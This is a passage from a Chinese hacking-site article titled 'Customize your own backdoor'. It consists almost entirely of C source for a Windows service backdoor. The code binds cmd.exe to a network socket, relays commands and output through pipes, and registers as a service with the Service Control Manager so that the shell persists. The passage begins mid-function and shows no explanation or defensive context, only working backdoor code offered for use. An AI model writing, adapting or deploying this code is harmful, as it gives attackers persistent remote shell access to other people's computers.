网络安全 频道

定制自己的后门[推荐]

siinfo.hStdInput = hReadPipe2;

siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;

CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);

while(1)

{

Sleep(100);

ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);

if(!lBytesRead)

{

lBytesRead = recv(s,Buff,1024,0);

if(lBytesRead <= 0) break;

ret = WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);

if(lBytesRead >= 4 && Buff[0]==\''e\'' && Buff[1]==\''x\'' && Buff[2]==\''i\'' && Buff[3]==\''t\'')

{

closesocket(s);

return 1;

}

if(!ret) break;

}

else

{

ret = ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);

if(!ret) break;

ret = send(s,Buff,lBytesRead,0);

if(ret <= 0) break;

}

}

}

closesocket(s);

WSACleanup();

return 1;

}

VOID terminate(DWORD error)

{

if (hTerminateEvent)

CloseHandle(hTerminateEvent);

if (hServiceStatus)

SendStatusToSCM(SERVICE_STOPPED, error,0, 0, 0);

if (hThread)

CloseHandle(hThread);

}

VOID ServiceMain(DWORD argc, LPTSTR *argv)

{

hServiceStatus = RegisterServiceCtrlHandler(

ServicesName, (LPHANDLER_FUNCTION)Handler);

if(!hServiceStatus)

{

terminate(GetLastError());

return;

}

if(!SendStatusToSCM(SERVICE_START_PENDING, NO_ERROR, 0, 1, 5000))

{

terminate(GetLastError());

return;

}

hTerminateEvent = CreateEvent (0, TRUE, FALSE, 0);

if(!hTerminateEvent)

{

terminate(GetLastError());

return;

}

if(!SendStatusToSCM(SERVICE_START_PENDING, NO_ERROR, 0, 2, 1000))

{

terminate(GetLastError());

return;

}

if(!SendStatusToSCM(SERVICE_START_PENDING, NO_ERROR, 0, 3, 5000))

{

terminate(GetLastError());

return;

}

if (!InitService())

{

terminate(GetLastError());

return;

}

if (!SendStatusToSCM(SERVICE_RUNNING, NO_ERROR, 0, 0, 0))

{

terminate(GetLastError());

return;

}

WaitForSingleObject (hTerminateEvent, INFINITE);

terminate(0);

}

BOOL SendStatusToSCM( DWORD dwCurrentState,

DWORD dwWin32ExitCode,

DWORD dwServiceSpecificExitCode,

DWORD dwCheckPoint,

DWORD dwWaitHint)

{

SERVICE_STATUS serviceStatus;

serviceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;

serviceStatus.dwCurrentState = dwCurrentState;

if (dwCurrentState == SERVICE_START_PENDING)

serviceStatus.dwControlsAccepted = 0;

else

serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP |

SERVICE_ACCEPT_PAUSE_CONTINUE |

SERVICE_ACCEPT_SHUTDOWN;

if (dwServiceSpecificExitCode == 0)

serviceStatus.dwWin32ExitCode = dwWin32ExitCode;

else

serviceStatus.dwWin32ExitCode = ERROR_SERVICE_SPECIFIC_ERROR;

serviceStatus.dwServiceSpecificExitCode =dwServiceSpecificExitCode;

serviceStatus.dwCheckPoint = dwCheckPoint;

serviceStatus.dwWaitHint = dwWaitHint;

return SetServiceStatus (hServiceStatus, &serviceStatus);

}

BOOL InitService()

{

DWORD id;

hThread = CreateThread(0, 0,(LPTHREAD_START_ROUTINE) BindCmd2Port,0, 0, &id);

if (hThread==0)

return FALSE;

else

{

bRunningService = TRUE;

return TRUE;

}

}

VOID Handler (DWORD controlCode)

{

DWORD currentState = 0;

BOOL success;

switch(controlCode)

{

case SERVICE_CONTROL_STOP:

success = SendStatusToSCM(SERVICE_STOP_PENDING,NO_ERROR, 0, 1, 5000);

bRunningService=FALSE;

SetEvent(hTerminateEvent);

return;

case SERVICE_CONTROL_PAUSE:

if (bRunningService && !bPauseService)

{

success = SendStatusToSCM(SERVICE_PAUSE_PENDING, NO_ERROR, 0, 1, 1000);

bPauseService = TRUE;

SuspendThread(hThread);

currentState = SERVICE_PAUSED;

}

break;

case SERVICE_CONTROL_CONTINUE:

if (bRunningService && bPauseService)

{

success = SendStatusToSCM(SERVICE_CONTINUE_PENDING, NO_ERROR, 0, 1, 1000);

bPauseService=FALSE;

ResumeThread(hThread);

currentState = SERVICE_RUNNING;

}

break;

case SERVICE_CONTROL_INTERROGATE:

break;

case SERVICE_CONTROL_SHUTDOWN:

return;

default:

break;

}

SendStatusToSCM(currentState, NO_ERROR, 0, 0, 0);

}

http://hackbase.com/tech/2004-11-14/765819.html

0
相关文章